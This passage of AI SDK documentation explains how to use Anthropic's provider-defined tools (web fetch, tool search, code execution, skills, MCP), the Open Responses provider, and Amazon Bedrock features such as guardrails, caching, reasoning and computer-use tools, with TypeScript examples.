userLocation: {
type: 'approximate',
country: 'US',
region: 'California',
city: 'San Francisco',
timezone: 'America/Los_Angeles',
},
});
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Find local news about technology',
tools: {
web_search: webSearchTool,
},
});
Web Fetch Tool
Anthropic provides a provider-defined web fetch tool that allows Claude to retrieve content from specific URLs. This is useful when you want Claude to analyze or reference content from a particular webpage or document.
You can enable web fetch using the provider-defined web fetch tool:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: anthropic('claude-sonnet-4-0'),
prompt:
'What is this page about? https://en.wikipedia.org/wiki/Maglemosian_culture',
tools: {
web_fetch: anthropic.tools.webFetch_20250910({ maxUses: 1 }),
},
});
Tool Search
Anthropic provides provider-defined tool search tools that enable Claude to work with hundreds or thousands of tools by dynamically discovering and loading them on-demand. Instead of loading all tool definitions into the context window upfront, Claude searches your tool catalog and loads only the tools it needs.
There are two variants:
- BM25 Search - Uses natural language queries to find tools
- Regex Search - Uses regex patterns (Python re.search() syntax) to find tools
Basic Usage
import { anthropic } from '@ai-sdk/anthropic';
import { generateText, tool } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
prompt: 'What is the weather in San Francisco?',
tools: {
toolSearch: anthropic.tools.toolSearchBm25_20251119(),
get_weather: tool({
description: 'Get the current weather at a specific location',
inputSchema: z.object({
location: z.string().describe('The city and state'),
}),
execute: async ({ location }) => ({
location,
temperature: 72,
condition: 'Sunny',
}),
// Defer tool here - Claude discovers these via the tool search tool
providerOptions: {
anthropic: { deferLoading: true },
},
}),
},
});
Using Regex Search
For more precise tool matching, you can use the regex variant:
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
prompt: 'Get the weather data',
tools: {
toolSearch: anthropic.tools.toolSearchRegex_20251119(),
// ... deferred tools
},
});
Claude will construct regex patterns like weather|temperature|forecast to find matching tools.
Custom Tool Search
You can implement your own tool search logic (e.g., using embeddings or semantic search) by returning tool-reference content blocks via toModelOutput:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText, tool } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
prompt: 'What is the weather in San Francisco?',
tools: {
// Custom search tool
searchTools: tool({
description: 'Search for tools by keyword',
inputSchema: z.object({ query: z.string() }),
execute: async ({ query }) => {
// Your custom search logic (embeddings, fuzzy match, etc.)
const allTools = ['get_weather', 'get_forecast', 'get_temperature'];
return allTools.filter(name => name.includes(query.toLowerCase()));
},
toModelOutput: ({ output }) => ({
type: 'content',
value: (output as string[]).map(toolName => ({
type: 'custom' as const,
providerOptions: {
anthropic: {
type: 'tool-reference',
toolName,
},
},
})),
}),
}),
// Deferred tools
get_weather: tool({
description: 'Get the current weather',
inputSchema: z.object({ location: z.string() }),
execute: async ({ location }) => ({ location, temperature: 72 }),
providerOptions: {
anthropic: { deferLoading: true },
},
}),
},
});
This sends tool_reference blocks to Anthropic, which loads the corresponding deferred tool schemas into Claude's context.
MCP Connectors
Anthropic supports connecting to MCP servers as part of their execution.
You can enable this feature with the mcpServers provider option:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
prompt: `Call the echo tool with "hello world". what does it respond with back?`,
providerOptions: {
anthropic: {
mcpServers: [
{
type: 'url',
name: 'echo',
url: 'https://echo.mcp.inevitable.fyi/mcp',
// optional: authorization token
authorizationToken: mcpAuthToken,
// optional: tool configuration
toolConfiguration: {
enabled: true,
allowedTools: ['echo'],
},
},
],
} satisfies AnthropicLanguageModelOptions,
},
});
The tool calls and results are dynamic, i.e. the input and output schemas are not known.
Configuration Options
The web fetch tool supports several configuration options:
- maxUses: number
  The maxUses parameter limits the number of web fetches performed.
- allowedDomains: string[]
  Only fetch from these domains.
- blockedDomains: string[]
  Never fetch from these domains.
- citations: object
  Unlike web search where citations are always enabled, citations are optional for web fetch. Set "citations": {"enabled": true} to enable Claude to cite specific passages from fetched documents.
- maxContentTokens: number
  The maxContentTokens parameter limits the amount of content that will be included in the context.
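A configured web fetch call might look like this (a sketch combining the options above; the option values are illustrative):
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
  model: anthropic('claude-sonnet-4-0'),
  prompt: 'Summarize https://en.wikipedia.org/wiki/Maglemosian_culture',
  tools: {
    web_fetch: anthropic.tools.webFetch_20250910({
      maxUses: 2,
      allowedDomains: ['en.wikipedia.org'],
      citations: { enabled: true }, // cite specific passages from fetched documents
      maxContentTokens: 50000,
    }),
  },
});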
Error Handling
Web search errors are handled differently depending on whether you're using streaming or non-streaming:
Non-streaming (generateText):
Web search errors throw exceptions that you can catch:
try {
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Search for something',
tools: {
web_search: webSearchTool,
},
});
} catch (error) {
if (error.message.includes('Web search failed')) {
console.log('Search error:', error.message);
// Handle search error appropriately
}
}
Streaming (streamText):
Web search errors are delivered as error parts in the stream:
const result = await streamText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Search for something',
tools: {
web_search: webSearchTool,
},
});
for await (const part of result.textStream) {
if (part.type === 'error') {
console.log('Search error:', part.error);
// Handle search error appropriately
}
}
Code Execution
Anthropic provides a provider-defined code execution tool that gives Claude direct access to a real Python environment allowing it to execute code to inform its responses.
You can enable code execution using the provider-defined code execution tool:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const codeExecutionTool = anthropic.tools.codeExecution_20260120();
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt:
'Calculate the mean and standard deviation of [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]',
tools: {
code_execution: codeExecutionTool,
},
});
Error Handling
Code execution errors are handled differently depending on whether you're using streaming or non-streaming:
Non-streaming (generateText):
Code execution errors are delivered as tool result parts in the response:
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Execute some Python script',
tools: {
code_execution: codeExecutionTool,
},
});
const toolErrors = result.content?.filter(
content => content.type === 'tool-error',
);
toolErrors?.forEach(error => {
console.error('Tool execution error:', {
toolName: error.toolName,
toolCallId: error.toolCallId,
error: error.error,
});
});
Streaming (streamText):
Code execution errors are delivered as error parts in the stream:
const result = await streamText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Execute some Python script',
tools: {
code_execution: codeExecutionTool,
},
});
for await (const part of result.textStream) {
if (part.type === 'error') {
console.log('Code execution error:', part.error);
// Handle code execution error appropriately
}
}
Programmatic Tool Calling
Programmatic Tool Calling allows Claude to write code that calls your tools programmatically within a code execution container, rather than requiring round trips through the model for each tool invocation. This reduces latency for multi-tool workflows and decreases token consumption.
To enable programmatic tool calling, use the allowedCallers provider option on tools that you want to be callable from within code execution:
import {
anthropic,
forwardAnthropicContainerIdFromLastStep,
} from '@ai-sdk/anthropic';
import { generateText, tool, stepCountIs } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
stopWhen: stepCountIs(10),
prompt:
'Get the weather for Tokyo, Sydney, and London, then calculate the average temperature.',
tools: {
code_execution: anthropic.tools.codeExecution_20260120(),
getWeather: tool({
description: 'Get current weather data for a city.',
inputSchema: z.object({
city: z.string().describe('Name of the city'),
}),
execute: async ({ city }) => {
// Your weather API implementation
return { temp: 22, condition: 'Sunny' };
},
// Enable this tool to be called from within code execution
providerOptions: {
anthropic: {
allowedCallers: ['code_execution_20260120'],
},
},
}),
},
// Propagate container ID between steps for code execution continuity
prepareStep: forwardAnthropicContainerIdFromLastStep,
});
In this flow:
- Claude writes Python code that calls your getWeather tool multiple times in parallel
- The SDK automatically executes your tool and returns results to the code execution container
- Claude processes the results in code and generates the final response
Container Persistence
When using programmatic tool calling across multiple steps, you need to preserve the container ID between steps using prepareStep. You can use the forwardAnthropicContainerIdFromLastStep helper function to do this automatically. The container ID is available in providerMetadata.anthropic.container.id after each step completes.
Agent Skills
Anthropic Agent Skills enable Claude to perform specialized tasks like document processing (PPTX, DOCX, PDF, XLSX) and data analysis. Skills run in a sandboxed container and require the code execution tool to be enabled.
Using Built-in Skills
Anthropic provides several built-in skills:
- pptx - Create and edit PowerPoint presentations
- docx - Create and edit Word documents
- pdf - Process and analyze PDF files
- xlsx - Work with Excel spreadsheets
To use skills, you need to:
- Enable the code execution tool
- Specify the container with skills in
providerOptions
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
tools: {
code_execution: anthropic.tools.codeExecution_20260120(),
},
prompt: 'Create a presentation about renewable energy with 5 slides',
providerOptions: {
anthropic: {
container: {
skills: [
{
type: 'anthropic',
skillId: 'pptx',
version: 'latest', // optional
},
],
},
} satisfies AnthropicLanguageModelOptions,
},
});
Custom Skills
You can also use custom skills by specifying type: 'custom':
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
tools: {
code_execution: anthropic.tools.codeExecution_20260120(),
},
prompt: 'Use my custom skill to process this data',
providerOptions: {
anthropic: {
container: {
skills: [
{
type: 'custom',
skillId: 'my-custom-skill-id',
version: '1.0', // optional
},
],
},
} satisfies AnthropicLanguageModelOptions,
},
});
PDF support
Anthropic Claude models support reading PDF files.
You can pass PDF files as part of the message content using the file type:
Option 1: URL-based PDF document
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: new URL(
'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/ai.pdf?raw=true',
),
mediaType: 'application/pdf',
},
],
},
],
});
Option 2: Base64-encoded PDF document
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
Model Capabilities
Supported models include claude-opus-4-7, claude-opus-4-6, claude-sonnet-4-6, claude-opus-4-5, claude-haiku-4-5, claude-sonnet-4-5, claude-opus-4-1, claude-opus-4-0, and claude-sonnet-4-0. Capabilities cover image input, object generation, tool usage, computer use, web search, tool search, and compaction, and vary by model.
title: Open Responses
description: Learn how to use the Open Responses provider for the AI SDK.
Open Responses Provider
The Open Responses provider contains language model support for Open Responses compatible APIs.
Setup
The Open Responses provider is available in the @ai-sdk/open-responses module. You can install it with
pnpm add @ai-sdk/open-responses
Provider Instance
Create an Open Responses provider instance using createOpenResponses:
import { createOpenResponses } from '@ai-sdk/open-responses';
const openResponses = createOpenResponses({
name: 'aProvider',
url: 'http://localhost:1234/v1/responses',
});
The name and url options are required:
- name: string
  Provider name. Used as the key for provider options and metadata.
- url: string
  URL for the Open Responses API POST endpoint.
You can use the following optional settings to customize the Open Responses provider instance:
- apiKey: string
  API key that is being sent using the Authorization header.
- headers: Record<string, string>
  Custom headers to include in the requests.
- fetch: (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function.
Language Models
The Open Responses provider instance is a function that you can invoke to create a language model:
const model = openResponses('mistralai/ministral-3-14b-reasoning');
You can use Open Responses models with the generateText and streamText functions,
and they support structured data generation with Output
(see AI SDK Core).
Example
import { createOpenResponses } from '@ai-sdk/open-responses';
import { generateText } from 'ai';
const openResponses = createOpenResponses({
name: 'aProvider',
url: 'http://localhost:1234/v1/responses',
});
const { text } = await generateText({
model: openResponses('mistralai/ministral-3-14b-reasoning'),
prompt: 'Invent a new holiday and describe its traditions.',
});
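Structured outputs can also be exercised with the AI SDK's generateObject helper (a sketch; generateObject is used here for illustration in place of the Output API mentioned above, and the schema is hypothetical):
import { createOpenResponses } from '@ai-sdk/open-responses';
import { generateObject } from 'ai';
import { z } from 'zod';
const openResponses = createOpenResponses({
  name: 'aProvider',
  url: 'http://localhost:1234/v1/responses',
});
const { object } = await generateObject({
  model: openResponses('mistralai/ministral-3-14b-reasoning'),
  schema: z.object({
    holiday: z.string(),
    traditions: z.array(z.string()),
  }),
  prompt: 'Invent a new holiday and describe its traditions.',
});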
Notes
- Stop sequences, topK, and seed are not supported and are ignored with warnings.
- Image inputs are supported for user messages with file parts using image media types.
title: Amazon Bedrock
description: Learn how to use the Amazon Bedrock provider.
Amazon Bedrock Provider
The Amazon Bedrock provider for the AI SDK contains language model support for the Amazon Bedrock APIs.
Setup
The Bedrock provider is available in the @ai-sdk/amazon-bedrock module. You can install it with
pnpm add @ai-sdk/amazon-bedrock
Prerequisites
Access to Amazon Bedrock foundation models isn't granted by default. In order to gain access to a foundation model, an IAM user with sufficient permissions needs to request access to it through the console. Once access is provided to a model, it is available for all users in the account.
See the Model Access Docs for more information.
Authentication
Using IAM Access Key and Secret Key
Step 1: Creating AWS Access Key and Secret Key
To get started, you'll need to create an AWS access key and secret key. Here's how:
Login to AWS Management Console
- Go to the AWS Management Console and log in with your AWS account credentials.
Create an IAM User
- Navigate to the IAM dashboard and click on "Users" in the left-hand navigation menu.
- Click on "Create user" and fill in the required details to create a new IAM user.
- Make sure to select "Programmatic access" as the access type.
- The user account needs the AmazonBedrockFullAccess policy attached to it.
Create Access Key
- Click on the "Security credentials" tab and then click on "Create access key".
- Click "Create access key" to generate a new access key pair.
- Download the .csv file containing the access key ID and secret access key.
Step 2: Configuring the Access Key and Secret Key
Within your project add a .env file if you don't already have one. This file will be used to set the access key and secret key as environment variables. Add the following lines to the .env file:
AWS_ACCESS_KEY_ID=YOUR_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY=YOUR_SECRET_ACCESS_KEY
AWS_REGION=YOUR_REGION
Remember to replace YOUR_ACCESS_KEY_ID, YOUR_SECRET_ACCESS_KEY, and YOUR_REGION with the actual values from your AWS account.
Using AWS SDK Credentials Chain (instance profiles, instance roles, ECS roles, EKS Service Accounts, etc.)
When using the AWS SDK, the SDK will automatically use the credentials chain to determine the credentials to use. This includes instance profiles, instance roles, ECS roles, EKS Service Accounts, etc. A similar behavior is possible with the AI SDK by not specifying the accessKeyId, secretAccessKey, and sessionToken properties in the provider settings and instead passing a credentialProvider property.
Usage:
The @aws-sdk/credential-providers package provides a set of credential providers that can be used to create a credential provider chain. You can install it with
pnpm add @aws-sdk/credential-providers
import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
import { fromNodeProviderChain } from '@aws-sdk/credential-providers';
const bedrock = createAmazonBedrock({
region: 'us-east-1',
credentialProvider: fromNodeProviderChain(),
});
Provider Instance
You can import the default provider instance bedrock from @ai-sdk/amazon-bedrock:
import { bedrock } from '@ai-sdk/amazon-bedrock';
If you need a customized setup, you can import createAmazonBedrock from @ai-sdk/amazon-bedrock and create a provider instance with your settings:
import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
const bedrock = createAmazonBedrock({
region: 'us-east-1',
accessKeyId: 'xxxxxxxxx',
secretAccessKey: 'xxxxxxxxx',
sessionToken: 'xxxxxxxxx',
});
You can use the following optional settings to customize the Amazon Bedrock provider instance:
- `region` *string*
  The AWS region that you want to use for the API calls. It uses the `AWS_REGION` environment variable by default.
- `accessKeyId` *string*
  The AWS access key ID that you want to use for the API calls. It uses the `AWS_ACCESS_KEY_ID` environment variable by default.
- `secretAccessKey` *string*
  The AWS secret access key that you want to use for the API calls. It uses the `AWS_SECRET_ACCESS_KEY` environment variable by default.
- `sessionToken` *string*
  Optional. The AWS session token that you want to use for the API calls. It uses the `AWS_SESSION_TOKEN` environment variable by default.
- `credentialProvider` *() => Promise<{ accessKeyId: string; secretAccessKey: string; sessionToken?: string; }>*
  Optional. The AWS credential provider chain that you want to use for the API calls. It uses the specified credentials by default.
- `apiKey` *string*
  Optional. API key for authenticating requests using Bearer token authentication. When provided, this will be used instead of AWS SigV4 authentication. It uses the `AWS_BEARER_TOKEN_BEDROCK` environment variable by default.
- `baseURL` *string*
  Optional. Base URL for the Bedrock API calls. Useful for custom endpoints or proxy configurations.
- `headers` *Record<string, string>*
  Optional. Custom headers to include in the requests.
- `fetch` *(input: RequestInfo, init?: RequestInit) => Promise<Response>*
  Optional. Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
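For example, a minimal sketch that uses the `fetch` setting as logging middleware (the logged label is illustrative):
import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
const bedrock = createAmazonBedrock({
  region: 'us-east-1',
  // Log every outgoing Bedrock request before delegating to the global fetch.
  fetch: async (input, init) => {
    console.log('Bedrock request:', input);
    return fetch(input, init);
  },
});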
Language Models
You can create models that call the Bedrock API using the provider instance.
The first argument is the model id, e.g. meta.llama3-70b-instruct-v1:0.
const model = bedrock('meta.llama3-70b-instruct-v1:0');
Amazon Bedrock models also support some model specific provider options that are not part of the standard call settings.
You can pass them in the providerOptions argument:
const model = bedrock('anthropic.claude-3-sonnet-20240229-v1:0');
await generateText({
model,
providerOptions: {
anthropic: {
additionalModelRequestFields: { top_k: 350 },
},
},
});
Documentation for additional settings based on the selected model can be found within the Amazon Bedrock Inference Parameter Documentation.
You can use Amazon Bedrock language models to generate text with the generateText function:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const { text } = await generateText({
model: bedrock('meta.llama3-70b-instruct-v1:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Amazon Bedrock language models can also be used in the streamText function
(see AI SDK Core).
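For example:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';
const result = streamText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
// Print the text as it streams in.
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}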
File Inputs
The Amazon Bedrock provider supports file inputs, e.g. PDF files.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
import { readFileSync } from 'fs';
const result = await generateText({
model: bedrock('anthropic.claude-3-haiku-20240307-v1:0'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe the pdf in detail.' },
{
type: 'file',
data: readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
Guardrails
You can use the bedrock provider options to utilize Amazon Bedrock Guardrails:
import { bedrock, type AmazonBedrockLanguageModelOptions } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const result = await generateText({
model: bedrock('anthropic.claude-3-sonnet-20240229-v1:0'),
prompt: 'Write a story about space exploration.',
providerOptions: {
bedrock: {
guardrailConfig: {
guardrailIdentifier: '1abcd2ef34gh',
guardrailVersion: '1',
trace: 'enabled' as const,
streamProcessingMode: 'async',
},
} satisfies AmazonBedrockLanguageModelOptions,
},
});
Tracing information will be returned in the provider metadata if you have tracing enabled.
if (result.providerMetadata?.bedrock.trace) {
// ...
}
See the Amazon Bedrock Guardrails documentation for more information.
Citations
Amazon Bedrock supports citations for document-based inputs across compatible models. When enabled:
- Some models can read documents with visual understanding, not just extracting text
- Models can cite specific parts of documents you provide, making it easier to trace information back to its source (Not Supported Yet)
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText, Output } from 'ai';
import { z } from 'zod';
import { readFileSync } from 'fs';
const result = await generateText({
model: bedrock('apac.anthropic.claude-sonnet-4-20250514-v1:0'),
output: Output.object({
schema: z.object({
summary: z.string().describe('Summary of the PDF document'),
keyPoints: z.array(z.string()).describe('Key points from the PDF'),
}),
}),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Summarize this PDF and provide key points.',
},
{
type: 'file',
data: readFileSync('./document.pdf'),
mediaType: 'application/pdf',
providerOptions: {
bedrock: {
citations: { enabled: true },
},
},
},
],
},
],
});
console.log('Response:', result.output);
Cache Points
In messages, you can use the providerOptions property to set cache points. Set the bedrock property in the providerOptions object to { cachePoint: { type: 'default' } } to create a cache point.
You can also specify a TTL (time-to-live) for cache points using the ttl property. Supported values are '5m' (5 minutes, default) and '1h' (1 hour). The 1-hour TTL is only supported by Claude Opus 4.5, Claude Haiku 4.5, and Claude Sonnet 4.5.
providerOptions: {
bedrock: { cachePoint: { type: 'default', ttl: '1h' } },
}
Cache usage information is returned in the providerMetadata object. See examples below.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const cyberpunkAnalysis =
'... literary analysis of cyberpunk themes and concepts ...';
const result = await generateText({
model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
messages: [
{
role: 'system',
content: `You are an expert on William Gibson's cyberpunk literature and themes. You have access to the following academic analysis: ${cyberpunkAnalysis}`,
providerOptions: {
bedrock: { cachePoint: { type: 'default' } },
},
},
{
role: 'user',
content:
'What are the key cyberpunk themes that Gibson explores in Neuromancer?',
},
],
});
console.log(result.text);
console.log(result.providerMetadata?.bedrock?.usage);
// Shows cache read/write token usage, e.g.:
// {
// cacheReadInputTokens: 1337,
// cacheWriteInputTokens: 42,
// }
Cache points also work with streaming responses:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';
const cyberpunkAnalysis =
'... literary analysis of cyberpunk themes and concepts ...';
const result = streamText({
model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
messages: [
{
role: 'assistant',
content: [
{ type: 'text', text: 'You are an expert on cyberpunk literature.' },
{ type: 'text', text: `Academic analysis: ${cyberpunkAnalysis}` },
],
providerOptions: { bedrock: { cachePoint: { type: 'default' } } },
},
{
role: 'user',
content:
'How does Gibson explore the relationship between humanity and technology?',
},
],
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log(
'Cache token usage:',
(await result.providerMetadata)?.bedrock?.usage,
);
// Shows cache read/write token usage, e.g.:
// {
// cacheReadInputTokens: 1337,
// cacheWriteInputTokens: 42,
// }
Provider Metadata
The following Bedrock-specific metadata may be returned in providerMetadata.bedrock:
- `trace` (optional): Guardrail tracing information (when tracing is enabled).
- `performanceConfig` (optional): Performance configuration, e.g. `{ latency: 'optimized' }`.
- `serviceTier` (optional): Service tier information, e.g. `{ type: 'on-demand' }`.
- `usage` (optional): Cache token usage details including `cacheWriteInputTokens` and `cacheDetails`.
- `stopSequence` *string | null*: The stop sequence that triggered the stop, if any.
Reasoning
Amazon Bedrock supports model creator-specific reasoning features:
- Anthropic (e.g. `claude-sonnet-4-5-20250929`): enable via the `reasoningConfig` provider option, specifying a thinking budget in tokens (minimum: `1024`, maximum: `64000`).
- Amazon (e.g. `us.amazon.nova-2-lite-v1:0`): enable via the `reasoningConfig` provider option, specifying a maximum reasoning effort level (`'low' | 'medium' | 'high'`).
import {
bedrock,
type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
// Anthropic example
const anthropicResult = await generateText({
model: bedrock('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
bedrock: {
reasoningConfig: { type: 'enabled', budgetTokens: 1024 },
} satisfies AmazonBedrockLanguageModelOptions,
},
});
console.log(anthropicResult.reasoningText); // reasoning text
console.log(anthropicResult.text); // text response
// Nova 2 example
const amazonResult = await generateText({
model: bedrock('us.amazon.nova-2-lite-v1:0'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
bedrock: {
reasoningConfig: { type: 'enabled', maxReasoningEffort: 'medium' },
} satisfies AmazonBedrockLanguageModelOptions,
},
});
console.log(amazonResult.reasoningText); // reasoning text
console.log(amazonResult.text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Service Tiers
Amazon Bedrock supports selecting an inference service tier per request via the serviceTier provider option.
import {
bedrock,
type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const result = await generateText({
model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
prompt: 'Summarize this support ticket backlog.',
providerOptions: {
bedrock: {
serviceTier: 'priority',
} satisfies AmazonBedrockLanguageModelOptions,
},
});
Supported values are:
- `reserved`
- `priority`
- `default`
- `flex`
See the Amazon Bedrock service tiers documentation for model availability and behavior.
Extended Context Window
Claude Sonnet 4 models on Amazon Bedrock support an extended context window of up to 1 million tokens when using the context-1m-2025-08-07 beta feature.
import {
bedrock,
type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const result = await generateText({
model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
prompt: 'analyze this large document...',
providerOptions: {
bedrock: {
anthropicBeta: ['context-1m-2025-08-07'],
} satisfies AmazonBedrockLanguageModelOptions,
},
});
Computer Use
Via Anthropic, Amazon Bedrock provides three provider-defined tools that can be used to interact with external systems:
- Bash Tool: Allows running bash commands.
- Text Editor Tool: Provides functionality for viewing and editing text files.
- Computer Tool: Enables control of keyboard and mouse actions on a computer.
They are available via the tools property of the provider instance.
Bash Tool
The Bash Tool allows running bash commands. Here's how to create and use it:
const bashTool = bedrock.tools.bash_20241022({
execute: async ({ command, restart }) => {
// Implement your bash command execution logic here
// Return the result of the command execution
},
});
Parameters:
- `command` (string): The bash command to run. Required unless the tool is being restarted.
- `restart` (boolean, optional): Specifying true will restart this tool.
Text Editor Tool
The Text Editor Tool provides functionality for viewing and editing text files.
For Claude 4 models (Opus & Sonnet):
const textEditorTool = bedrock.tools.textEditor_20250429({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
insert_text,
old_str,
view_range,
}) => {
// Implement your text editing logic here
// Return the result of the text editing operation
},
});
For Claude 3.5 Sonnet and earlier models:
const textEditorTool = bedrock.tools.textEditor_20241022({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
insert_text,
old_str,
view_range,
}) => {
// Implement your text editing logic here
// Return the result of the text editing operation
},
});
Parameters:
- `command` ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: `undo_edit` is only available in Claude 3.5 Sonnet and earlier models.
- `path` (string): Absolute path to file or directory, e.g. `/repo/file.py` or `/repo`.
- `file_text` (string, optional): Required for the `create` command, with the content of the file to be created.
- `insert_line` (number, optional): Required for the `insert` command. The line number after which to insert the new string.
- `new_str` (string, optional): New string for the `str_replace` command.
- `insert_text` (string, optional): Required for the `insert` command, containing the text to insert.
- `old_str` (string, optional): Required for the `str_replace` command, containing the string to replace.
- `view_range` (number[], optional): Optional for the `view` command to specify the line range to show.
When using the Text Editor Tool, make sure to name the key in the tools object correctly:
- Claude 4 models: Use `str_replace_based_edit_tool`
- Claude 3.5 Sonnet and earlier: Use `str_replace_editor`
// For Claude 4 models
const response = await generateText({
model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
prompt:
"Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
tools: {
str_replace_based_edit_tool: textEditorTool, // Claude 4 tool name
},
});
// For Claude 3.5 Sonnet and earlier
const response = await generateText({
model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
prompt:
"Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
tools: {
str_replace_editor: textEditorTool, // Earlier models tool name
},
});
Computer Tool
The Computer Tool enables control of keyboard and mouse actions on a computer:
const computerTool = bedrock.tools.computer_20241022({
displayWidthPx: 1920,
displayHeightPx: 1080,
displayNumber: 0, // Optional, for X11 environments
execute: async ({ action, coordinate, text }) => {
// Implement your computer control logic here
// Return the result of the action
// Example code:
switch (action) {
case 'screenshot': {
// multipart result:
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
console.log('Action:', action);
console.log('Coordinate:', coordinate);
console.log('Text:', text);
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput({ output }) {
return typeof output === 'string'
? [{ type: 'text', text: output }]
: [{ type: 'image', data: output.data, mediaType: 'image/png' }];
},
});
Parameters:
- `action` ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
- `coordinate` (number[], optional): Required for the `mouse_move` and `left_click_drag` actions. Specifies the (x, y) coordinates.
- `text` (string, optional): Required for the `type` and `key` actions.
These tools can be used in conjunction with the anthropic.claude-3-5-sonnet-20240620-v1:0 model to enable more complex interactions and tasks.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| `amazon.titan-tg1-large` | | | | |
| `amazon.titan-text-express-v1` | | | | |
| `amazon.titan-text-lite-v1` | | | | |
| `us.amazon.nova-premier-v1:0` | | | | |
| `us.amazon.nova-pro-v1:0` | | | | |
| `us.amazon.nova-lite-v1:0` | | | | |
| `us.amazon.nova-micro-v1:0` | | | | |
| `anthropic.claude-haiku-4-5-20251001-v1:0` | | | | |
| `anthropic.claude-sonnet-4-20250514-v1:0` | | | | |
| `anthropic.claude-sonnet-4-5-20250929-v1:0` | | | | |
| `anthropic.claude-opus-4-20250514-v1:0` | | | | |
| `anthropic.claude-opus-4-1-20250805-v1:0` | | | | |
| `anthropic.claude-3-5-sonnet-20241022-v2:0` | | | | |
| `anthropic.claude-3-5-sonnet-20240620-v1:0` | | | | |
| `anthropic.claude-3-opus-20240229-v1:0` | | | | |
| `anthropic.claude-3-sonnet-20240229-v1:0` | | | | |
| `anthropic.claude-3-haiku-20240307-v1:0` | | | | |
| `us.anthropic.claude-sonnet-4-20250514-v1:0` | | | | |
| `us.anthropic.claude-sonnet-4-5-20250929-v1:0` | | | | |
